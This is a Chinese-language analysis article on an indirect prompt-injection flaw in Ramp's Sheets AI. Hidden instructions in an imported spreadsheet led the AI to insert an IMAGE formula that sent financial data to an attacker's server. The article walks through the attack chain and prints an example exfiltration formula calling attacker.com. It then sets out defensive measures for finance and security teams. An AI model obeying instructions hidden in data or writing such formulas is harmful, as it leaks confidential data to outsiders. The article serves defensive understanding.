一个财务同事导入一份行业增长率表,想让 AI 帮忙和自家模型做对比。
正常需求。风险也藏在这里。
PromptArmor 披露,Ramp 的 Sheets AI 曾可被外部参考表格里的隐藏指令诱导。用户没有主动下恶意命令,恶意提示藏在数据里。AI 读取后自动插入一个 IMAGE 公式,公式向攻击者服务器发请求,并把工作簿里的敏感财务数据拼进 URL。
Ramp 安全团队表示,该问题已在 2026 年 3 月 16 日修复。现在能确认的是:研究者展示了一条可利用攻击链和服务器日志演示。不能据此推断已有真实客户数据被盗。
攻击链短,危险在权限叠加
这不是宏病毒,也不是用户点了恶意脚本。
它更像办公 AI 时代的新缝隙:不可信输入、敏感表格、自动执行,被放在同一个工作空间里。
| 环节 | 发生了什么 | 风险点 |
|---|---|---|
| 外部数据 | 用户导入行业统计、共享表格、邮件附件等参考数据 | 来源不可信 |
| 隐藏指令 | 外部表格里藏着间接 prompt injection | 用户未必看见 |
| AI 处理 | AI 同时读取参考数据和财务模型 | 敏感数据与脏输入混在一起 |
| 自动写入 | AI 被诱导插入 IMAGE 公式 | 写入动作缺少可见批准 |
| 外部请求 | 公式访问攻击者 URL,并附带敏感字段 | 数据离开工作簿边界 |
恶意公式的逻辑并不复杂,大意是:
=IMAGE("https://attacker.com/visualize.png?{victim_sensitive_financial_data_here}")
IMAGE 本来是展示图片的函数。问题在于,只要它能触发外部请求,就可能被当成数据外送口。
这类风险最贴近财务模型、预算、预测、经营指标、收入拆分。也就是公司里最不该随便外传的那批表格。
对财务和运营团队,影响很直接:
- 来路不明的参考表,不要直接和核心模型放进同一个 AI 可读工作簿。
- 涉及预算、预测、收入拆分时,先关闭或限制 AI 自动写入公式。
- 看到图片函数、外链函数、会联网的公式,要按数据外发风险处理。
- 采购这类工具时,不要只看“自动分析多强”,要问公式写入、外联告警、审计记录怎么做。
这里的关键词不是“AI 犯错”。是代理拿到了太多连续权限。
办公 AI 的分水岭不是聪明,是边界
我不太买账那种“AI 又不安全了”的粗糙说法。它省事,但没解释到点上。
真正的问题是三件事叠在一起:AI 能读敏感数据,能改表格,还能通过公式触发外部通信。只要审批不可见,用户就不知道危险动作何时发生。
聊天机器人被骗,常见后果是胡说八道。办公代理被骗,后果会重很多:它可能替你改模型、写公式、发请求。
这就是分水岭。
不是模型更强就更安全。很多时候,模型越能干,权限设计越要保守。
Anthropic 后来对 Claude for Excel 的处理有参照意义。PromptArmor 之前发现类似风险后,Claude for Excel 加入红色警告,展示将被插入的完整公式,并更新文档提示外联风险。
| 产品 / 处理 | 已知后续变化 | 说明 |
|---|---|---|
| Ramp Sheets AI | Ramp 称 2026 年 3 月 16 日已修复 | 负责任披露后的修补 |
| Claude for Excel | 对可能产生外部网络流量的公式加红色警告,展示完整公式 | 把隐藏动作拉回用户眼前 |
这个对比不能说明所有表格 AI 都有同样漏洞。证据不够,不能乱推。
但它至少说明一件事:同类产品只要采用类似设计,就要面对类似问题。尤其是那些能读文件、能写入内容、还能调用外部资源的办公代理。
“工欲善其事,必先利其器。”问题是,利器进入财务表格后,不能只问锋不锋利,还要问刀鞘在哪里。
自动化厂商天然想减少确认步骤。确认越少,产品越顺滑,演示越好看。
但财务场景里,摩擦有时就是安全本身。弹窗不是重点。用户能不能看懂将要写入什么、会不会联网、会带出哪些字段,才是重点。
接下来别只看补丁,要看三个开关
Ramp 已经表示修复了具体问题,这一点应该肯定。
但这件事留下的行业账没有结清。修一个漏洞是一回事,重做权限边界是另一回事。
企业安全负责人和 SaaS 风控团队,接下来最该盯三个开关:
| 开关 | 应该问什么 | 不合格信号 |
|---|---|---|
| 写入审批 | AI 写公式前,是否展示完整公式和影响范围 | 只给一个含糊确认框 |
| 外联控制 | 公式或函数触发网络请求时,是否单独告警 | 用户不知道哪里会联网 |
| 数据隔离 | 外部参考数据和核心财务模型能否分区处理 | 不可信输入可直接影响敏感表 |
采购动作也该变得更慢一点。
如果供应商说“AI 可以自动完成表格分析”,企业应该追问:能不能限制跨 sheet 读取?能不能禁止自动写入外链公式?能不能按工作簿、字段、数据源做权限?审批日志能不能审计?
这些问题不性感。但它们决定 AI 是助手,还是一个披着助手外衣的外联通道。
对产品团队也一样。别把 human-in-the-loop 做成心理安慰。
用户看不到完整公式,就谈不上审批。用户不知道哪里会联网,就谈不上知情。管理员不能限制代理读写范围,就谈不上权限控制。
回到开头那个场景:用户只是想比较行业数据和公司模型。需求本身不危险。
危险的是,系统把可信账本和陌生纸条放在同一张桌上,还让一个执行力很强的助手照单全收。
办公 AI 正在从“帮你写字”变成“帮你动手”。一旦它能动手,安全边界就不能再押给提示词和模型自觉。